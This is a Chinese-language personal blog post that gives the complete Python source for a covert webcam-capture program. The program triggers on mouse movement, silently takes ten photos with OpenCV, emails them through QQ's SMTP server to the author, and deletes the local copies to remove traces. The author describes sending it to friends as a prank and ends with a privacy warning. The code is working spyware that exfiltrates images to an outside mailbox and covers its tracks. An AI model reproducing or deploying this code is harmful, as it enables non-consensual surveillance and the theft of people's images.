
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>悄无声息获取你的照片 - Murphy</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Obsidian Murphy Blog,"> 
    <meta name="description" content="Hello,I Am Murphy,这是我觉得我做的比较厉害的，有含金量的程序，感觉很有意思！做了这个程序，发给了几个朋友，发现大多数人都没有遮挡电脑摄像头的习习惯我这个编程水平不怎么样的人，都能够写出这样一个程序，说明，获取人的图像,"> 
    <meta name="author" content="Murphy Hou"> 
    <link rel="alternative" href="atom.xml" title="Murphy" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">

    
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">

    
<link rel="stylesheet" href="/css/obsidian.css">

    
<link rel="stylesheet" href="/css/ball-atom.min.css">

    
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome/css/font-awesome.min.css">

    
<meta name="generator" content="Hexo 5.4.1"></head>


<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">Murphy</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="https://murphyhoucn.github.io">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">悄无声息获取你的照片</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url('https://murhyimgur.oss-cn-beijing.aliyuncs.com/website/hacking-2903156_1920.jpg') ">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="/categories/想法实现"><b>「
                    </b>想法实现<b> 」</b></a>
                
                四月 22, 2021
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/2021/04/22/%E6%82%84%E6%97%A0%E5%A3%B0%E6%81%AF%E8%8E%B7%E5%8F%96%E4%BD%A0%E7%9A%84%E7%85%A7%E7%89%87/" title="悄无声息获取你的照片" class="">悄无声息获取你的照片</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>文章字数</i>
                    5.8k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>阅读约需</i>
                    5 mins.
                </span>
                
                
                <span id="/2021/04/22/悄无声息获取你的照片/" class="leancloud_visitors" data-flag-title="悄无声息获取你的照片">
                    <b class="iconfont icon-read"></b> <i>阅读次数</i>
                    <span class="leancloud-visitors-count">1000000</span>
                </span>
                
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list" itemprop="keywords"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/OpenCV/" rel="tag">OpenCV</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/yagmail/" rel="tag">yagmail</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <p>这是我觉得我做的比较厉害的，有含金量的程序，感觉很有意思！<br>做了这个程序，发给了几个朋友，发现大多数人都没有遮挡电脑摄像头的习习惯<br>我这个编程水平不怎么样的人，都能够写出这样一个程序，说明，获取人的图像隐私就这么悄无声息，这么容易。<br>互联网上时刻保持警惕，注意自己的隐私安全！</p>
<span id="more"></span>


<h1 id="关于项目"><a href="#关于项目" class="headerlink" title="关于项目"></a>关于项目</h1><h2 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h2><ul>
<li>很久之前学习了python的CV库调用并打开电脑摄像头的程序；</li>
<li>之后又增加了按键盘的某个键就会拍照的功能；</li>
<li>然后我想有没有可能通过一些别的功能，将拍下的照片发送给我，不是为了获取什么隐私，只是与朋友之间大玩笑而已；</li>
<li>首先是自动拍照的功能的实现，我选了监控键盘和鼠标的动作的python库–pyinput。如果打开了应用程序，通过监控鼠标的运动，如果鼠标动了，就激活了程序，拍摄一定数量的照片；</li>
<li>然后就是将照片发送给我的功能实现，这起初确实是一个比较困难的事情，发送文件得借助第三方软件；</li>
<li>在我苦思冥想的时候，我想到了邮件，邮件，邮件！！！</li>
<li>python有yagmail库，可以实现自动发送邮件；</li>
<li>QQ邮箱可以打开STMP,POP3,IMAP等协议，实现远程调用QQ邮箱发送邮件的功能；</li>
<li>所以这个程序的出现也就水到渠成了；</li>
</ul>
<h2 id="程序目标"><a href="#程序目标" class="headerlink" title="程序目标"></a>程序目标</h2><ul>
<li>捕获打开程序的人的图片</li>
<li>将图片自动发送给我</li>
<li>程序需要较强的娱乐性，简单性</li>
<li>程序最好只在自己的朋友圈子中传递</li>
</ul>
<h2 id="选择编程语言"><a href="#选择编程语言" class="headerlink" title="选择编程语言"></a>选择编程语言</h2><ul>
<li>python——Windows开发</li>
<li>python的第三方库很多，及其方便于做一些新奇的小玩意</li>
</ul>
<h2 id="基本思路"><a href="#基本思路" class="headerlink" title="基本思路"></a>基本思路</h2><h4 id="opencv"><a href="#opencv" class="headerlink" title="opencv"></a>opencv</h4><ul>
<li>通过opencv拍摄程序调用者的照片</li>
<li>opencv可以方便的对拍摄的照片进行保存</li>
</ul>
<h4 id="程序触发方式"><a href="#程序触发方式" class="headerlink" title="程序触发方式"></a>程序触发方式</h4><ul>
<li>直接触发/手动触发</li>
</ul>
<h4 id="图片发送方式"><a href="#图片发送方式" class="headerlink" title="图片发送方式"></a>图片发送方式</h4><ul>
<li>思来想去，觉得最方便的应该是邮件的方式了</li>
<li>自动化邮件之类的项目应该是一个比较成熟的了</li>
</ul>
<h4 id="程序测试方式"><a href="#程序测试方式" class="headerlink" title="程序测试方式"></a>程序测试方式</h4><ul>
<li>测试对象是：朋友们，因为使用照片拍摄，涉及到了个人隐私问题，程序不便于广泛地传播</li>
</ul>
<h1 id="项目完整代码"><a href="#项目完整代码" class="headerlink" title="项目完整代码"></a>项目完整代码</h1><pre><code class="python"># -*- coding : utf-8 -*-
# Time       : 2021/7/26 10:08
# Author     : MurphyHou
# Proj_Name  : cv_capture
# File_Name  : capture_demo4.py
# Software   : PyCharm
# =======Here We Go!=======

#设置把程序运行过程中拍摄的照片在发送成功之后删除掉
import cv2
from pynput.mouse import Listener
import yagmail
import os

mouse_return=0

def on_move(x,y):# 监听鼠标的位置
    # print(&quot;mouse:&#123;&#125;&quot;.format(x,y))
    global mouse_return
    mouse_return=x

    return False  # 不能返回True,否则程序不会停止


def send_mail():
    # 设置邮箱服务器
    mail_host=&quot;smtp.qq.com&quot;
    # 设置发送方邮箱————最好使用小号邮箱吧，免得引发什么误会
    mail_sender=&#39;xxx.qq.com&#39;
    # 设置发送方邮箱密码
    mail_pass=&quot;xxxxx&quot;
    # 设置接受方邮箱————最好使用小号邮箱吧，免得引发什么误会
    mail_receiver=&#39;xxx.qq.com&#39;
    # mail_receiver[&#39;xxx.qq.com&#39;,&#39;xxx.163.com&#39;,&#39;xxx.outlook.com&#39;] # 设置多个接收方

    yag = yagmail.SMTP(user=mail_sender,password=mail_pass,host=mail_host)

    contents=\
        [&#39;capture pictures&#39;,#邮件正文中写入文字
         yagmail.inline(&#39;MurphyHou_capture_5.jpg&#39;),# 邮件正文中直接插入照片
         &#39;MurphyHou_capture_1.jpg&#39;,# 邮件中按附件方式发送图片
         &#39;MurphyHou_capture_2.jpg&#39;,
         &#39;MurphyHou_capture_3.jpg&#39;,
         &#39;MurphyHou_capture_4.jpg&#39;,
         &#39;MurphyHou_capture_6.jpg&#39;,
         &#39;MurphyHou_capture_7.jpg&#39;,
         &#39;MurphyHou_capture_8.jpg&#39;,
         &#39;MurphyHou_capture_9.jpg&#39;,
         &#39;MurphyHou_capture_10.jpg&#39;
         ]
    try:

        yag.send(to=mail_receiver,subject=&quot;from yagmail_cv_capture&quot;,contents=contents)
        print(&quot;Send Success!&quot;)
    except Exception as error:
        print(&quot;Error:&quot;,error)


def delete():
    for i in range(1,11):
        file_name=&quot;MurphyHou_capture_&quot;+str(i)+&quot;.jpg&quot;
        
        if os.path.isfile(file_name):
            os.remove(file_name)
        else:
            print(&quot;fie &#123;&#125; doesn&#39;t exit!&quot;.format(file_name))

    print(&quot;Delete Success!&quot;)


if __name__==&quot;__main__&quot;:
    with Listener(on_move=on_move) as listener:
        listener.join()

    cap=cv2.VideoCapture(0)#创建对象
    num=1
    while(cap.isOpened()):#当摄像头被打开时，循环捕捉帧
        while(num&lt;11):#设置拍摄10张照片
            ret_flag, image_show = cap.read()  # 函数返回值是有两个参数
            cv2.imshow(&quot;Capture&quot;, image_show)  # 创建窗口，窗口的显示值为捕捉的图像，名称为Capture
            if mouse_return!=0:  # 当鼠标发生移动时触发程序
                # 设置窗口大小
                cap.get(4)
                cap.get(3)

                # print(&quot;success:&quot;+str(num))
                cv2.imwrite(&quot;MurphyHou_capture_&quot;+str(num) + &quot;.jpg&quot;, image_show)
                num += 1

        cap.release()
        cv2.destroyAllWindows()   #放到检测摄像头是否处于开状态的while循环之内，就能保证窗口在程序运行结束之后可以自动关闭

        send_mail()

        delete()#绝对删除，不会存在回收站中
</code></pre>
<h1 id="关于项目的思考"><a href="#关于项目的思考" class="headerlink" title="关于项目的思考"></a>关于项目的思考</h1><h2 id="程序的优点"><a href="#程序的优点" class="headerlink" title="程序的优点"></a>程序的优点</h2><ul>
<li>比较好得实现了目标的功能，符合预期</li>
<li>程序本身的功能并不是有多少很大的用处，更多的的是朋友之间的玩笑，更重要的是用程序实现了这个功能的过程中，学会了一点点OpenCV的一些基本的使用，以及yagmail自动化邮件的现实，总结就是，实现这个没有多少用的程序过程中学到的一些使用是重要的！</li>
</ul>
<h2 id="程序尚存的不足-可以改进的方向"><a href="#程序尚存的不足-可以改进的方向" class="headerlink" title="程序尚存的不足(可以改进的方向)"></a>程序尚存的不足(可以改进的方向)</h2><ul>
<li><del>程序运行结束后，拍摄的照片（程序运行过的证据doge），删除问题</del>（已添加此功能）</li>
<li>图片保存路径问题<ul>
<li>因为无法确定程序运行者将程序下载到了什么路径，目前采用的是将图片直接保存到改程序保存的路径下。这样做的问题是，如果将程序保存到了C盘（包括桌面）中，由于权限问题，图片可能因为没有权限，不能保存；</li>
<li>可能的改进方向是：首先检测计算机的磁盘信息，判断有多少个磁盘，如果有出去C盘外的其他盘，则将图片保存到其他盘，否则保存到程序所保存的位置！</li>
</ul>
</li>
<li>邮件发送的最大次数<ul>
<li>邮箱都有发送的最大次数，超过这个次数当日便不能发送了</li>
<li>这个问题好像不太容易解决，程序无法判断程序今天已经发送过多少次了</li>
</ul>
</li>
<li>对电脑硬件有要求<ul>
<li>现在很多电脑都没有摄像头，那肯定没办法拍照片的</li>
</ul>
</li>
</ul>
<h2 id="对程序本身的反思"><a href="#对程序本身的反思" class="headerlink" title="对程序本身的反思"></a>对程序本身的反思</h2><ul>
<li>因为涉及到人像的拍摄，会涉及到个人隐私问题，所以程序本身并不可以广泛传播</li>
</ul>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/statics/chengdu.mp3'></li>
                
                    
            </ul>
            
                        
            
            
            <div id="vcomments"></div>
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://murhyimgur.oss-cn-beijing.aliyuncs.com/website/me.jpg" height=300 width=300></img>
                    <p>MurphyHou</p>
                    <span>A Future Without Disappointment!</span>
                    <dl>
                        
                        
                            
                                <dd>
                                    <link rel="stylesheet" type="text/css" href="">
                                    <a href="function link() { [native code] }" target="_blank"><span
                                    class=" iconfont "></span></a>
                                </dd>
                            
                            
                            
                        
                    </dl>
                </div>
                <ul>
                    <li><a href="/">55 <p>文章</p></a></li>
                    <li><a href="/categories">11 <p>分类</p></a></li>
                    <li><a href="/tags">65 <p>标签</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>目录</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E9%A1%B9%E7%9B%AE"><span class="toc-number">1.</span> <span class="toc-text">关于项目</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B5%B7%E5%9B%A0"><span class="toc-number">1.1.</span> <span class="toc-text">起因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E7%9B%AE%E6%A0%87"><span class="toc-number">1.2.</span> <span class="toc-text">程序目标</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%89%E6%8B%A9%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80"><span class="toc-number">1.3.</span> <span class="toc-text">选择编程语言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E6%80%9D%E8%B7%AF"><span class="toc-number">1.4.</span> <span class="toc-text">基本思路</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A1%B9%E7%9B%AE%E5%AE%8C%E6%95%B4%E4%BB%A3%E7%A0%81"><span class="toc-number">2.</span> <span class="toc-text">项目完整代码</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E9%A1%B9%E7%9B%AE%E7%9A%84%E6%80%9D%E8%80%83"><span class="toc-number">3.</span> <span class="toc-text">关于项目的思考</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E7%9A%84%E4%BC%98%E7%82%B9"><span class="toc-number">3.1.</span> <span class="toc-text">程序的优点</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E5%B0%9A%E5%AD%98%E7%9A%84%E4%B8%8D%E8%B6%B3-%E5%8F%AF%E4%BB%A5%E6%94%B9%E8%BF%9B%E7%9A%84%E6%96%B9%E5%90%91"><span class="toc-number">3.2.</span> <span class="toc-text">程序尚存的不足(可以改进的方向)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AF%B9%E7%A8%8B%E5%BA%8F%E6%9C%AC%E8%BA%AB%E7%9A%84%E5%8F%8D%E6%80%9D"><span class="toc-number">3.3.</span> <span class="toc-text">对程序本身的反思</span></a></li></ol></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2022
        <span class="gradient-text">
            Murphy Hou
        </span>.
        Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a>
        Theme
        <span class="gradient-text">
            <a href="https://github.com/TriDiamond/hexo-theme-obsidian" title="Obsidian" target="_blank" rel="noopener">Obsidian</a>
        </span>
        <small><a href="https://github.com/TriDiamond/hexo-theme-obsidian/blob/master/CHANGELOG.md" title="v1.4.9.3" target="_blank" rel="noopener">v1.4.9.3</a></small>
        
        
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>


 
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>
 
<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>
 
<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>
 
<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>


<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>
 
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>
   
<script src="/js/busuanzi.min.js"></script>

<script>
  $(document).ready(function () {
    if ($('span[id^="busuanzi_"]').length) {
      initialBusuanzi();
    }
  });
</script>
 
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">


<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>
  

<script>
  function initialTyped() {
    var typedTextEl = $('.typed-text');
    if (typedTextEl && typedTextEl.length > 0) {
      var typed = new Typed('.typed-text', {
        strings: ['Dreams&#39; never sold, blood&#39;s never cold.', '十年饮冰，难凉热血。'],
        typeSpeed: 90,
        loop: true,
        loopCount: Infinity,
        backSpeed: 20,
      });
    }
  }

  if ($('.article-header') && $('.article-header').length) {
    $(document).ready(function () {
      initialTyped();
    });
  }
</script>

 
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>

<script>
  var valine = new Valine();

  function initValine(path) {
    if (!path) path = window.location.pathname;
    let language = 'zh-CN';
    if (!language) {
      language = 'en';
    } else {
      language = language.toLowerCase();
    }
    valine.init({
      el: '#vcomments',
      appId: '',
      appKey: '',
      notify: 'true',
      verify: 'true',
      avatar: 'mp',
      placeholder: 'Leave your throughs behind~',
      visitor: 'true',
      path: path,
      lang: language,
    });
  }

  $(document).ready(function () {
    initValine();
  });
</script>






</html>
